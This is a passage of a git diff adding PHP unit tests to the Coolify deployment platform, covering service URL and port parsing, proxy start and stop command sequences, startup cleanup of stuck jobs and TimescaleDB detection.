expect($fqdn1)->toBe('https://test.abc'); + + // Appwrite console (/console) + $fqdn2 = 'https://test.abc'; + $path2 = '/console'; + if ($path2 !== '/' && ! str($fqdn2)->endsWith($path2)) { + $fqdn2 = "$fqdn2$path2"; + } + expect($fqdn2)->toBe('https://test.abc/console'); + + // Appwrite realtime (/v1/realtime) + $fqdn3 = 'https://test.abc'; + $path3 = '/v1/realtime'; + if ($path3 !== '/' && ! str($fqdn3)->endsWith($path3)) { + $fqdn3 = "$fqdn3$path3"; + } + expect($fqdn3)->toBe('https://test.abc/v1/realtime'); +}); + +test('nested paths are handled correctly', function () { + $fqdn = 'https://test.abc'; + $path = '/api/v1/endpoint'; + + if (! str($fqdn)->endsWith($path)) { + $fqdn = "$fqdn$path"; + } + + expect($fqdn)->toBe('https://test.abc/api/v1/endpoint'); + + // Second call should not duplicate + if (! str($fqdn)->endsWith($path)) { + $fqdn = "$fqdn$path"; + } + + expect($fqdn)->toBe('https://test.abc/api/v1/endpoint'); +}); + +test('MindsDB /api path is handled correctly', function () { + $fqdn = 'https://test.abc'; + $path = '/api'; + + // First parse + if (! str($fqdn)->endsWith($path)) { + $fqdn = "$fqdn$path"; + } + expect($fqdn)->toBe('https://test.abc/api'); + + // Second parse should not duplicate + if (! str($fqdn)->endsWith($path)) { + $fqdn = "$fqdn$path"; + } + expect($fqdn)->toBe('https://test.abc/api'); +}); + +test('fqdnValueForEnv path handling works correctly', function () { + $fqdnValueForEnv = 'test.abc'; + $path = '/v1/realtime'; + + // First append + if (! str($fqdnValueForEnv)->endsWith($path)) { + $fqdnValueForEnv = "$fqdnValueForEnv$path"; + } + expect($fqdnValueForEnv)->toBe('test.abc/v1/realtime'); + + // Second attempt should not duplicate + if (! str($fqdnValueForEnv)->endsWith($path)) { + $fqdnValueForEnv = "$fqdnValueForEnv$path"; + } + expect($fqdnValueForEnv)->toBe('test.abc/v1/realtime'); +}); + +test('url path handling works correctly', function () { + $url = 'https://test.abc'; + $path = '/v1/realtime'; + + // First append + if (! str($url)->endsWith($path)) { + $url = "$url$path"; + } + expect($url)->toBe('https://test.abc/v1/realtime'); + + // Second attempt should not duplicate + if (! str($url)->endsWith($path)) { + $url = "$url$path"; + } + expect($url)->toBe('https://test.abc/v1/realtime'); +}); diff --git a/tests/Unit/ServiceParserPortDetectionLogicTest.php b/tests/Unit/ServiceParserPortDetectionLogicTest.php new file mode 100644 index 000000000..d677039af --- /dev/null +++ b/tests/Unit/ServiceParserPortDetectionLogicTest.php @@ -0,0 +1,158 @@ +toBe($expectedService, "Service name mismatch for $varName"); + expect($parsed['port'])->toBe($expectedPort, "Port mismatch for $varName"); + expect($parsed['has_port'])->toBe($isPortSpecific, "Port detection mismatch for $varName"); + } +}); + +it('shows current underscore-counting logic fails for some patterns', function () { + // This demonstrates the CURRENT BROKEN logic: substr_count === 3 + + $testCases = [ + // [variable_name, underscore_count, should_detect_port] + + // Works correctly with current logic (3 underscores total) + ['SERVICE_URL_APP_3000', 3, true], // 3 underscores ✓ + ['SERVICE_URL_API_8080', 3, true], // 3 underscores ✓ + + // FAILS: 4 underscores (two-word service + port) - current logic says no port + ['SERVICE_URL_MY_API_8080', 4, true], // 4 underscores ✗ + ['SERVICE_URL_WEB_APP_3000', 4, true], // 4 underscores ✗ + + // FAILS: 5+ underscores (three-word service + port) - current logic says no port + ['SERVICE_URL_REDIS_CACHE_SERVER_6379', 5, true], // 5 underscores ✗ + ['SERVICE_URL_MY_LONG_APP_8080', 5, true], // 5 underscores ✗ + + // Works correctly (no port, not 3 underscores) + ['SERVICE_URL_MY_APP', 3, false], // 3 underscores but non-numeric ✓ + ['SERVICE_URL_APP', 2, false], // 2 underscores ✓ + ]; + + foreach ($testCases as [$varName, $expectedUnderscoreCount, $shouldDetectPort]) { + $key = str($varName); + + // Current logic: count underscores + $underscoreCount = substr_count($key->value(), '_'); + expect($underscoreCount)->toBe($expectedUnderscoreCount, "Underscore count for $varName"); + + $currentLogicDetectsPort = ($underscoreCount === 3); + + // Correct logic: check if numeric + $lastSegment = $key->afterLast('_')->value(); + $correctLogicDetectsPort = is_numeric($lastSegment); + + expect($correctLogicDetectsPort)->toBe($shouldDetectPort, "Correct logic should detect port for $varName"); + + // Show the discrepancy where current logic fails + if ($currentLogicDetectsPort !== $correctLogicDetectsPort) { + // This is a known bug - current logic is wrong + expect($currentLogicDetectsPort)->not->toBe($correctLogicDetectsPort, "Bug confirmed: current logic wrong for $varName"); + } + } +}); + +it('generates correct URL with port suffix', function () { + // Test that URLs are correctly formatted with port appended + + $testCases = [ + ['http://umami-abc123.domain.com', '3000', 'http://umami-abc123.domain.com:3000'], + ['http://api-xyz789.domain.com', '8080', 'http://api-xyz789.domain.com:8080'], + ['https://db-server.example.com', '5432', 'https://db-server.example.com:5432'], + ['http://app.local', '80', 'http://app.local:80'], + ]; + + foreach ($testCases as [$baseUrl, $port, $expectedUrlWithPort]) { + $urlWithPort = "$baseUrl:$port"; + expect($urlWithPort)->toBe($expectedUrlWithPort); + } +}); + +it('generates correct FQDN with port suffix', function () { + // Test that FQDNs are correctly formatted with port appended + + $testCases = [ + ['umami-abc123.domain.com', '3000', 'umami-abc123.domain.com:3000'], + ['postgres-xyz789.domain.com', '5432', 'postgres-xyz789.domain.com:5432'], + ['redis-cache.example.com', '6379', 'redis-cache.example.com:6379'], + ]; + + foreach ($testCases as [$baseFqdn, $port, $expectedFqdnWithPort]) { + $fqdnWithPort = "$baseFqdn:$port"; + expect($fqdnWithPort)->toBe($expectedFqdnWithPort); + } +}); + +it('correctly identifies service name with various patterns', function () { + // Test service name extraction with different patterns + + $testCases = [ + // After parsing, service names should preserve underscores + ['SERVICE_URL_MY_API_8080', 'my_api'], + ['SERVICE_URL_REDIS_CACHE_6379', 'redis_cache'], + ['SERVICE_URL_NEW_API_3000', 'new_api'], + ['SERVICE_FQDN_DB_SERVER_5432', 'db_server'], + + // Single-word services + ['SERVICE_URL_UMAMI_3000', 'umami'], + ['SERVICE_URL_MYAPP_8080', 'myapp'], + + // Without port + ['SERVICE_URL_MY_APP', 'my_app'], + ['SERVICE_URL_REDIS_PRIMARY', 'redis_primary'], + ]; + + foreach ($testCases as [$varName, $expectedServiceName]) { + // Use the actual helper function from bootstrap/helpers/services.php + $parsed = parseServiceEnvironmentVariable($varName); + + expect($parsed['service_name'])->toBe($expectedServiceName, "Service name extraction for $varName"); + } +}); diff --git a/tests/Unit/ServicePortSpecificVariablesTest.php b/tests/Unit/ServicePortSpecificVariablesTest.php index 9c9966aaf..16aa74486 100644 --- a/tests/Unit/ServicePortSpecificVariablesTest.php +++ b/tests/Unit/ServicePortSpecificVariablesTest.php @@ -172,3 +172,50 @@ expect($extractedPort)->toBe((string) $port, "Port extraction failed for $description"); } }); + +it('detects port-specific variables with numeric suffix', function () { + // Test that variables ending with a numeric port are detected correctly + // This tests the logic: if last segment after _ is numeric, it's a port + + $tests = [ + // 2-underscore pattern: single-word service name + port + 'SERVICE_URL_MYAPP_3000' => ['service' => 'myapp', 'port' => '3000', 'hasPort' => true], + 'SERVICE_URL_REDIS_6379' => ['service' => 'redis', 'port' => '6379', 'hasPort' => true], + 'SERVICE_FQDN_NGINX_80' => ['service' => 'nginx', 'port' => '80', 'hasPort' => true], + + // 3-underscore pattern: two-word service name + port + 'SERVICE_URL_MY_API_8080' => ['service' => 'my_api', 'port' => '8080', 'hasPort' => true], + 'SERVICE_URL_WEB_APP_3000' => ['service' => 'web_app', 'port' => '3000', 'hasPort' => true], + 'SERVICE_FQDN_DB_SERVER_5432' => ['service' => 'db_server', 'port' => '5432', 'hasPort' => true], + + // 4-underscore pattern: three-word service name + port + 'SERVICE_URL_REDIS_CACHE_SERVER_6379' => ['service' => 'redis_cache_server', 'port' => '6379', 'hasPort' => true], + 'SERVICE_URL_MY_LONG_APP_8080' => ['service' => 'my_long_app', 'port' => '8080', 'hasPort' => true], + 'SERVICE_FQDN_POSTGRES_PRIMARY_DB_5432' => ['service' => 'postgres_primary_db', 'port' => '5432', 'hasPort' => true], + + // Non-numeric suffix: should NOT be treated as port-specific + 'SERVICE_URL_MY_APP' => ['service' => 'my_app', 'port' => null, 'hasPort' => false], + 'SERVICE_URL_REDIS_PRIMARY' => ['service' => 'redis_primary', 'port' => null, 'hasPort' => false], + 'SERVICE_FQDN_WEB_SERVER' => ['service' => 'web_server', 'port' => null, 'hasPort' => false], + 'SERVICE_URL_APP_CACHE_REDIS' => ['service' => 'app_cache_redis', 'port' => null, 'hasPort' => false], + + // Edge numeric cases + 'SERVICE_URL_APP_0' => ['service' => 'app', 'port' => '0', 'hasPort' => true], // Port 0 + 'SERVICE_URL_APP_99999' => ['service' => 'app', 'port' => '99999', 'hasPort' => true], // Port out of range + 'SERVICE_URL_APP_3.14' => ['service' => 'app_3.14', 'port' => null, 'hasPort' => false], // Float (should not be port) + 'SERVICE_URL_APP_1e5' => ['service' => 'app_1e5', 'port' => null, 'hasPort' => false], // Scientific notation + + // Edge cases + 'SERVICE_URL_APP' => ['service' => 'app', 'port' => null, 'hasPort' => false], + 'SERVICE_FQDN_DB' => ['service' => 'db', 'port' => null, 'hasPort' => false], + ]; + + foreach ($tests as $varName => $expected) { + // Use the actual helper function from bootstrap/helpers/services.php + $parsed = parseServiceEnvironmentVariable($varName); + + expect($parsed['service_name'])->toBe($expected['service'], "Service name mismatch for $varName"); + expect($parsed['port'])->toBe($expected['port'], "Port mismatch for $varName"); + expect($parsed['has_port'])->toBe($expected['hasPort'], "Port detection mismatch for $varName"); + } +}); diff --git a/tests/Unit/ServiceRequiredPortTest.php b/tests/Unit/ServiceRequiredPortTest.php index 70bf2bca2..2ad345c44 100644 --- a/tests/Unit/ServiceRequiredPortTest.php +++ b/tests/Unit/ServiceRequiredPortTest.php @@ -151,3 +151,120 @@ expect($result)->toBeFalse(); }); + +it('detects port from map-style SERVICE_URL environment variable', function () { + $yaml = <<<'YAML' +services: + trigger: + environment: + SERVICE_URL_TRIGGER_3000: "" + OTHER_VAR: value +YAML; + + $service = Mockery::mock(Service::class)->makePartial(); + $service->docker_compose_raw = $yaml; + $service->shouldReceive('getRequiredPort')->andReturn(null); + + $app = Mockery::mock(ServiceApplication::class)->makePartial(); + $app->name = 'trigger'; + $app->shouldReceive('getAttribute')->with('service')->andReturn($service); + $app->service = $service; + + // Call the actual getRequiredPort method + $result = $app->getRequiredPort(); + + expect($result)->toBe(3000); +}); + +it('detects port from map-style SERVICE_FQDN environment variable', function () { + $yaml = <<<'YAML' +services: + langfuse: + environment: + SERVICE_FQDN_LANGFUSE_3000: localhost + DATABASE_URL: postgres://... +YAML; + + $service = Mockery::mock(Service::class)->makePartial(); + $service->docker_compose_raw = $yaml; + $service->shouldReceive('getRequiredPort')->andReturn(null); + + $app = Mockery::mock(ServiceApplication::class)->makePartial(); + $app->name = 'langfuse'; + $app->shouldReceive('getAttribute')->with('service')->andReturn($service); + $app->service = $service; + + $result = $app->getRequiredPort(); + + expect($result)->toBe(3000); +}); + +it('returns null for map-style environment without port', function () { + $yaml = <<<'YAML' +services: + db: + environment: + SERVICE_FQDN_DB: localhost + SERVICE_URL_DB: http://localhost +YAML; + + $service = Mockery::mock(Service::class)->makePartial(); + $service->docker_compose_raw = $yaml; + $service->shouldReceive('getRequiredPort')->andReturn(null); + + $app = Mockery::mock(ServiceApplication::class)->makePartial(); + $app->name = 'db'; + $app->shouldReceive('getAttribute')->with('service')->andReturn($service); + $app->service = $service; + + $result = $app->getRequiredPort(); + + expect($result)->toBeNull(); +}); + +it('handles list-style environment with port', function () { + $yaml = <<<'YAML' +services: + umami: + environment: + - SERVICE_URL_UMAMI_3000 + - DATABASE_URL=postgres://db/umami +YAML; + + $service = Mockery::mock(Service::class)->makePartial(); + $service->docker_compose_raw = $yaml; + $service->shouldReceive('getRequiredPort')->andReturn(null); + + $app = Mockery::mock(ServiceApplication::class)->makePartial(); + $app->name = 'umami'; + $app->shouldReceive('getAttribute')->with('service')->andReturn($service); + $app->service = $service; + + $result = $app->getRequiredPort(); + + expect($result)->toBe(3000); +}); + +it('prioritizes first port found in environment', function () { + $yaml = <<<'YAML' +services: + multi: + environment: + SERVICE_URL_MULTI_3000: "" + SERVICE_URL_MULTI_8080: "" +YAML; + + $service = Mockery::mock(Service::class)->makePartial(); + $service->docker_compose_raw = $yaml; + $service->shouldReceive('getRequiredPort')->andReturn(null); + + $app = Mockery::mock(ServiceApplication::class)->makePartial(); + $app->name = 'multi'; + $app->shouldReceive('getAttribute')->with('service')->andReturn($service); + $app->service = $service; + + $result = $app->getRequiredPort(); + + // Should return one of the ports (depends on array iteration order) + expect($result)->toBeIn([3000, 8080]); +}); diff --git a/tests/Unit/StartProxyTest.php b/tests/Unit/StartProxyTest.php new file mode 100644 index 000000000..7b6589d60 --- /dev/null +++ b/tests/Unit/StartProxyTest.php @@ -0,0 +1,87 @@ +/dev/null || true', + ' docker rm -f coolify-proxy 2>/dev/null || true', + ' # Wait for container to be fully removed', + ' for i in {1..10}; do', + ' if ! docker ps -a --format "{{.Names}}" | grep -q "^coolify-proxy$"; then', + ' break', + ' fi', + ' echo "Waiting for coolify-proxy to be removed... ($i/10)"', + ' sleep 1', + ' done', + " echo 'Successfully stopped and removed existing coolify-proxy.'", + 'fi', + "echo 'Starting coolify-proxy.'", + 'docker compose up -d --wait --remove-orphans', + "echo 'Successfully started coolify-proxy.'", + ]); + + $commandsString = $commands->implode("\n"); + + // Verify the cleanup sequence includes all required components + expect($commandsString)->toContain('docker stop coolify-proxy 2>/dev/null || true') + ->and($commandsString)->toContain('docker rm -f coolify-proxy 2>/dev/null || true') + ->and($commandsString)->toContain('for i in {1..10}; do') + ->and($commandsString)->toContain('if ! docker ps -a --format "{{.Names}}" | grep -q "^coolify-proxy$"; then') + ->and($commandsString)->toContain('break') + ->and($commandsString)->toContain('sleep 1') + ->and($commandsString)->toContain('docker compose up -d --wait --remove-orphans'); + + // Verify the order: cleanup must come before compose up + $stopPosition = strpos($commandsString, 'docker stop coolify-proxy'); + $waitLoopPosition = strpos($commandsString, 'for i in {1..10}'); + $composeUpPosition = strpos($commandsString, 'docker compose up -d'); + + expect($stopPosition)->toBeLessThan($waitLoopPosition) + ->and($waitLoopPosition)->toBeLessThan($composeUpPosition); +}); + +it('includes error suppression in container cleanup commands', function () { + // Test that cleanup commands suppress errors to prevent failures + // when the container doesn't exist + + $cleanupCommands = [ + ' docker stop coolify-proxy 2>/dev/null || true', + ' docker rm -f coolify-proxy 2>/dev/null || true', + ]; + + foreach ($cleanupCommands as $command) { + expect($command)->toContain('2>/dev/null || true'); + } +}); + +it('waits up to 10 seconds for container removal', function () { + // Verify the wait loop has correct bounds + + $waitLoop = [ + ' for i in {1..10}; do', + ' if ! docker ps -a --format "{{.Names}}" | grep -q "^coolify-proxy$"; then', + ' break', + ' fi', + ' echo "Waiting for coolify-proxy to be removed... ($i/10)"', + ' sleep 1', + ' done', + ]; + + $loopString = implode("\n", $waitLoop); + + // Verify loop iterates 10 times + expect($loopString)->toContain('{1..10}') + ->and($loopString)->toContain('sleep 1') + ->and($loopString)->toContain('break'); // Early exit when container is gone +}); diff --git a/tests/Unit/StartupExecutionCleanupTest.php b/tests/Unit/StartupExecutionCleanupTest.php new file mode 100644 index 000000000..1fae590eb --- /dev/null +++ b/tests/Unit/StartupExecutionCleanupTest.php @@ -0,0 +1,116 @@ +shouldReceive('where') + ->once() + ->with('status', 'running') + ->andReturnSelf(); + + // Expect update to be called with correct parameters + $mockBuilder->shouldReceive('update') + ->once() + ->with([ + 'status' => 'failed', + 'message' => 'Marked as failed during Coolify startup - job was interrupted', + 'finished_at' => Carbon::now(), + ]) + ->andReturn(2); // Simulate 2 records updated + + // Execute the cleanup logic directly + $updatedCount = ScheduledTaskExecution::where('status', 'running')->update([ + 'status' => 'failed', + 'message' => 'Marked as failed during Coolify startup - job was interrupted', + 'finished_at' => Carbon::now(), + ]); + + // Assert the count is correct + expect($updatedCount)->toBe(2); +}); + +it('marks stuck database backup executions as failed without triggering notifications', function () { + // Mock the ScheduledDatabaseBackupExecution model + $mockBuilder = \Mockery::mock('alias:'.ScheduledDatabaseBackupExecution::class); + + // Expect where clause to be called with 'running' status + $mockBuilder->shouldReceive('where') + ->once() + ->with('status', 'running') + ->andReturnSelf(); + + // Expect update to be called with correct parameters + $mockBuilder->shouldReceive('update') + ->once() + ->with([ + 'status' => 'failed', + 'message' => 'Marked as failed during Coolify startup - job was interrupted', + 'finished_at' => Carbon::now(), + ]) + ->andReturn(3); // Simulate 3 records updated + + // Execute the cleanup logic directly + $updatedCount = ScheduledDatabaseBackupExecution::where('status', 'running')->update([ + 'status' => 'failed', + 'message' => 'Marked as failed during Coolify startup - job was interrupted', + 'finished_at' => Carbon::now(), + ]); + + // Assert the count is correct + expect($updatedCount)->toBe(3); +}); + +it('handles cleanup when no stuck executions exist', function () { + // Mock the ScheduledTaskExecution model + $mockBuilder = \Mockery::mock('alias:'.ScheduledTaskExecution::class); + + $mockBuilder->shouldReceive('where') + ->once() + ->with('status', 'running') + ->andReturnSelf(); + + $mockBuilder->shouldReceive('update') + ->once() + ->andReturn(0); // No records updated + + $updatedCount = ScheduledTaskExecution::where('status', 'running')->update([ + 'status' => 'failed', + 'message' => 'Marked as failed during Coolify startup - job was interrupted', + 'finished_at' => Carbon::now(), + ]); + + expect($updatedCount)->toBe(0); +}); + +it('uses correct failure message for interrupted jobs', function () { + $expectedMessage = 'Marked as failed during Coolify startup - job was interrupted'; + + // Verify the message clearly indicates the job was interrupted during startup + expect($expectedMessage) + ->toContain('Coolify startup') + ->toContain('interrupted') + ->toContain('failed'); +}); + +it('sets finished_at timestamp when marking executions as failed', function () { + $now = Carbon::now(); + + // Verify Carbon::now() is used for finished_at + expect($now)->toBeInstanceOf(Carbon::class) + ->and($now->toDateTimeString())->toBe('2025-01-15 12:00:00'); +}); diff --git a/tests/Unit/StopProxyTest.php b/tests/Unit/StopProxyTest.php new file mode 100644 index 000000000..62151e1d1 --- /dev/null +++ b/tests/Unit/StopProxyTest.php @@ -0,0 +1,69 @@ +/dev/null || true', + 'docker rm -f coolify-proxy 2>/dev/null || true', + '# Wait for container to be fully removed', + 'for i in {1..10}; do', + ' if ! docker ps -a --format "{{.Names}}" | grep -q "^coolify-proxy$"; then', + ' break', + ' fi', + ' sleep 1', + 'done', + ]; + + $commandsString = implode("\n", $commands); + + // Verify the stop sequence includes all required components + expect($commandsString)->toContain('docker stop --time=30 coolify-proxy') + ->and($commandsString)->toContain('docker rm -f coolify-proxy') + ->and($commandsString)->toContain('for i in {1..10}; do') + ->and($commandsString)->toContain('if ! docker ps -a --format "{{.Names}}" | grep -q "^coolify-proxy$"') + ->and($commandsString)->toContain('break') + ->and($commandsString)->toContain('sleep 1'); + + // Verify order: stop before remove, and wait loop after remove + $stopPosition = strpos($commandsString, 'docker stop'); + $removePosition = strpos($commandsString, 'docker rm -f'); + $waitLoopPosition = strpos($commandsString, 'for i in {1..10}'); + + expect($stopPosition)->toBeLessThan($removePosition) + ->and($removePosition)->toBeLessThan($waitLoopPosition); +}); + +it('includes error suppression in stop proxy commands', function () { + // Test that stop/remove commands suppress errors gracefully + + $commands = [ + 'docker stop --time=30 coolify-proxy 2>/dev/null || true', + 'docker rm -f coolify-proxy 2>/dev/null || true', + ]; + + foreach ($commands as $command) { + expect($command)->toContain('2>/dev/null || true'); + } +}); + +it('uses configurable timeout for docker stop', function () { + // Verify that stop command includes the timeout parameter + + $timeout = 30; + $stopCommand = "docker stop --time=$timeout coolify-proxy 2>/dev/null || true"; + + expect($stopCommand)->toContain('--time=30'); +}); + +it('waits for swarm service container removal correctly', function () { + // Test that the container name pattern matches swarm naming + + $containerName = 'coolify-proxy_traefik'; + $checkCommand = " if ! docker ps -a --format \"{{.Names}}\" | grep -q \"^$containerName$\"; then"; + + expect($checkCommand)->toContain('coolify-proxy_traefik'); +}); diff --git a/tests/Unit/StripCoolifyCustomFieldsTest.php b/tests/Unit/StripCoolifyCustomFieldsTest.php new file mode 100644 index 000000000..de9a299a8 --- /dev/null +++ b/tests/Unit/StripCoolifyCustomFieldsTest.php @@ -0,0 +1,229 @@ + [ + 'web' => [ + 'image' => 'nginx:latest', + 'exclude_from_hc' => true, + 'ports' => ['80:80'], + ], + ], + ]; + + $result = stripCoolifyCustomFields($yaml); + + assertEquals('nginx:latest', $result['services']['web']['image']); + assertEquals(['80:80'], $result['services']['web']['ports']); + expect($result['services']['web'])->not->toHaveKey('exclude_from_hc'); +}); + +test('removes content from volume level', function () { + $yaml = [ + 'services' => [ + 'app' => [ + 'image' => 'php:8.4', + 'volumes' => [ + [ + 'type' => 'bind', + 'source' => './config.xml', + 'target' => '/app/config.xml', + 'content' => '', + ], + ], + ], + ], + ]; + + $result = stripCoolifyCustomFields($yaml); + + expect($result['services']['app']['volumes'][0])->toHaveKeys(['type', 'source', 'target']); + expect($result['services']['app']['volumes'][0])->not->toHaveKey('content'); +}); + +test('removes isDirectory from volume level', function () { + $yaml = [ + 'services' => [ + 'app' => [ + 'image' => 'node:20', + 'volumes' => [ + [ + 'type' => 'bind', + 'source' => './data', + 'target' => '/app/data', + 'isDirectory' => true, + ], + ], + ], + ], + ]; + + $result = stripCoolifyCustomFields($yaml); + + expect($result['services']['app']['volumes'][0])->toHaveKeys(['type', 'source', 'target']); + expect($result['services']['app']['volumes'][0])->not->toHaveKey('isDirectory'); +}); + +test('removes is_directory from volume level', function () { + $yaml = [ + 'services' => [ + 'app' => [ + 'image' => 'python:3.12', + 'volumes' => [ + [ + 'type' => 'bind', + 'source' => './logs', + 'target' => '/var/log/app', + 'is_directory' => true, + ], + ], + ], + ], + ]; + + $result = stripCoolifyCustomFields($yaml); + + expect($result['services']['app']['volumes'][0])->toHaveKeys(['type', 'source', 'target']); + expect($result['services']['app']['volumes'][0])->not->toHaveKey('is_directory'); +}); + +test('removes all custom fields together', function () { + $yaml = [ + 'services' => [ + 'web' => [ + 'image' => 'nginx:latest', + 'exclude_from_hc' => true, + 'volumes' => [ + [ + 'type' => 'bind', + 'source' => './config.xml', + 'target' => '/etc/nginx/config.xml', + 'content' => '', + 'isDirectory' => false, + ], + [ + 'type' => 'bind', + 'source' => './data', + 'target' => '/var/www/data', + 'is_directory' => true, + ], + ], + ], + 'worker' => [ + 'image' => 'worker:latest', + 'exclude_from_hc' => true, + ], + ], + ]; + + $result = stripCoolifyCustomFields($yaml); + + // Verify service-level custom fields removed + expect($result['services']['web'])->not->toHaveKey('exclude_from_hc'); + expect($result['services']['worker'])->not->toHaveKey('exclude_from_hc'); + + // Verify volume-level custom fields removed + expect($result['services']['web']['volumes'][0])->not->toHaveKey('content'); + expect($result['services']['web']['volumes'][0])->not->toHaveKey('isDirectory'); + expect($result['services']['web']['volumes'][1])->not->toHaveKey('is_directory'); + + // Verify standard fields preserved + assertEquals('nginx:latest', $result['services']['web']['image']); + assertEquals('worker:latest', $result['services']['worker']['image']); +}); + +test('preserves standard Docker Compose fields', function () { + $yaml = [ + 'services' => [ + 'db' => [ + 'image' => 'postgres:16', + 'environment' => [ + 'POSTGRES_DB' => 'mydb', + 'POSTGRES_USER' => 'user', + ], + 'ports' => ['5432:5432'], + 'volumes' => [ + 'db-data:/var/lib/postgresql/data', + ], + 'healthcheck' => [ + 'test' => ['CMD', 'pg_isready'], + 'interval' => '5s', + ], + 'restart' => 'unless-stopped', + 'networks' => ['backend'], + ], + ], + 'networks' => [ + 'backend' => [ + 'driver' => 'bridge', + ], + ], + 'volumes' => [ + 'db-data' => null, + ], + ]; + + $result = stripCoolifyCustomFields($yaml); + + // All standard fields should be preserved + expect($result)->toHaveKeys(['services', 'networks', 'volumes']); + expect($result['services']['db'])->toHaveKeys([ + 'image', 'environment', 'ports', 'volumes', + 'healthcheck', 'restart', 'networks', + ]); + assertEquals('postgres:16', $result['services']['db']['image']); + assertEquals(['5432:5432'], $result['services']['db']['ports']); +}); + +test('handles missing services gracefully', function () { + $yaml = [ + 'version' => '3.8', + ]; + + $result = stripCoolifyCustomFields($yaml); + + expect($result)->toBe($yaml); +}); + +test('handles missing volumes in service gracefully', function () { + $yaml = [ + 'services' => [ + 'app' => [ + 'image' => 'nginx:latest', + 'exclude_from_hc' => true, + ], + ], + ]; + + $result = stripCoolifyCustomFields($yaml); + + expect($result['services']['app'])->not->toHaveKey('exclude_from_hc'); + expect($result['services']['app'])->not->toHaveKey('volumes'); + assertEquals('nginx:latest', $result['services']['app']['image']); +}); + +test('handles traccar.yaml example with multiline content', function () { + $yaml = [ + 'services' => [ + 'traccar' => [ + 'image' => 'traccar/traccar:latest', + 'volumes' => [ + [ + 'type' => 'bind', + 'source' => './srv/traccar/conf/traccar.xml', + 'target' => '/opt/traccar/conf/traccar.xml', + 'content' => "\n\n\n ./conf/default.xml\n", + ], + ], + ], + ], + ]; + + $result = stripCoolifyCustomFields($yaml); + + expect($result['services']['traccar']['volumes'][0])->toHaveKeys(['type', 'source', 'target']); + expect($result['services']['traccar']['volumes'][0])->not->toHaveKey('content'); + assertEquals('./srv/traccar/conf/traccar.xml', $result['services']['traccar']['volumes'][0]['source']); +}); diff --git a/tests/Unit/TimescaleDbDetectionTest.php b/tests/Unit/TimescaleDbDetectionTest.php new file mode 100644 index 000000000..70c4ed1c1 --- /dev/null +++ b/tests/Unit/TimescaleDbDetectionTest.php @@ -0,0 +1,80 @@ + 'timescale/timescaledb', + 'environment' => [ + 'POSTGRES_DB=$POSTGRES_DB', + 'POSTGRES_USER=$SERVICE_USER_POSTGRES', + 'POSTGRES_PASSWORD=$SERVICE_PASSWORD_POSTGRES', + ], + 'volumes' => [ + 'timescaledb-data:/var/lib/postgresql/data', + ], + ]; + + $isDatabase = isDatabaseImage($image, $serviceConfig); + + assertTrue($isDatabase, 'TimescaleDB with POSTGRES_PASSWORD should be detected as database'); +}); + +test('timescaledb is detected as database without service config', function () { + $image = 'timescale/timescaledb'; + + $isDatabase = isDatabaseImage($image); + + assertTrue($isDatabase, 'TimescaleDB image should be in DATABASE_DOCKER_IMAGES constant'); +}); + +test('timescaledb-ha is detected as database', function () { + $image = 'timescale/timescaledb-ha'; + + $isDatabase = isDatabaseImage($image); + + assertTrue($isDatabase, 'TimescaleDB HA image should be in DATABASE_DOCKER_IMAGES constant'); +}); + +test('timescaledb databaseType returns postgresql', function () { + $database = new ServiceDatabase; + $database->setRawAttributes(['image' => 'timescale/timescaledb:latest', 'custom_type' => null]); + $database->syncOriginal(); + + $type = $database->databaseType(); + + expect($type)->toBe('standalone-postgresql'); +}); + +test('timescaledb-ha databaseType returns postgresql', function () { + $database = new ServiceDatabase; + $database->setRawAttributes(['image' => 'timescale/timescaledb-ha:pg17', 'custom_type' => null]); + $database->syncOriginal(); + + $type = $database->databaseType(); + + expect($type)->toBe('standalone-postgresql'); +}); + +test('timescaledb backup solution is available', function () { + $database = new ServiceDatabase; + $database->setRawAttributes(['image' => 'timescale/timescaledb:latest', 'custom_type' => null]); + $database->syncOriginal(); + + $isAvailable = $database->isBackupSolutionAvailable(); + + assertTrue($isAvailable, 'TimescaleDB should have backup solution available'); +}); + +test('timescaledb-ha backup solution is available', function () { + $database = new ServiceDatabase; + $database->setRawAttributes(['image' => 'timescale/timescaledb-ha:pg17', 'custom_type' => null]); + $database->syncOriginal(); + + $isAvailable = $database->isBackupSolutionAvailable(); + + assertTrue($isAvailable, 'TimescaleDB HA should have backup solution available'); +}); diff --git a/tests/Unit/UpdateComposeAbbreviatedVariablesTest.php b/tests/Unit/UpdateComposeAbbreviatedVariablesTest.php new file mode 100644 index 000000000..4ef7def9c --- /dev/null +++ b/tests/Unit/UpdateComposeAbbreviatedVariablesTest.php @@ -0,0 +1,563 @@ +before('=')->trim(); + if ($envVarName->startsWith('SERVICE_FQDN_') || $envVarName->startsWith('SERVICE_URL_')) { + $templateVariableNames[] = $envVarName->value(); + } + } + } + + expect($templateVariableNames)->toContain('SERVICE_URL_OPDASHBOARD_3000'); + expect($templateVariableNames)->not->toContain('OTHER_VAR'); +}); + +it('only detects directly declared SERVICE_URL variables not references', function () { + $yaml = <<<'YAML' +services: + openpanel-dashboard: + environment: + - SERVICE_URL_OPDASHBOARD_3000 + - NEXT_PUBLIC_DASHBOARD_URL=${SERVICE_URL_OPDASHBOARD} + - NEXT_PUBLIC_API_URL=${SERVICE_URL_OPAPI} +YAML; + + $dockerCompose = Yaml::parse($yaml); + $serviceConfig = data_get($dockerCompose, 'services.openpanel-dashboard'); + $environment = data_get($serviceConfig, 'environment', []); + + $templateVariableNames = []; + foreach ($environment as $envVar) { + if (is_string($envVar)) { + $envVarName = str($envVar)->before('=')->trim(); + if ($envVarName->startsWith('SERVICE_FQDN_') || $envVarName->startsWith('SERVICE_URL_')) { + $templateVariableNames[] = $envVarName->value(); + } + } + } + + // Should only detect the direct declaration + expect($templateVariableNames)->toContain('SERVICE_URL_OPDASHBOARD_3000'); + // Should NOT detect references (those belong to other services) + expect($templateVariableNames)->not->toContain('SERVICE_URL_OPDASHBOARD'); + expect($templateVariableNames)->not->toContain('SERVICE_URL_OPAPI'); +}); + +it('detects multiple directly declared SERVICE_URL variables', function () { + $yaml = <<<'YAML' +services: + app: + environment: + - SERVICE_URL_APP + - SERVICE_URL_APP_3000 + - SERVICE_FQDN_API +YAML; + + $dockerCompose = Yaml::parse($yaml); + $serviceConfig = data_get($dockerCompose, 'services.app'); + $environment = data_get($serviceConfig, 'environment', []); + + $templateVariableNames = []; + foreach ($environment as $envVar) { + if (is_string($envVar)) { + // Extract variable name (before '=' if present) + $envVarName = str($envVar)->before('=')->trim(); + if ($envVarName->startsWith('SERVICE_FQDN_') || $envVarName->startsWith('SERVICE_URL_')) { + $templateVariableNames[] = 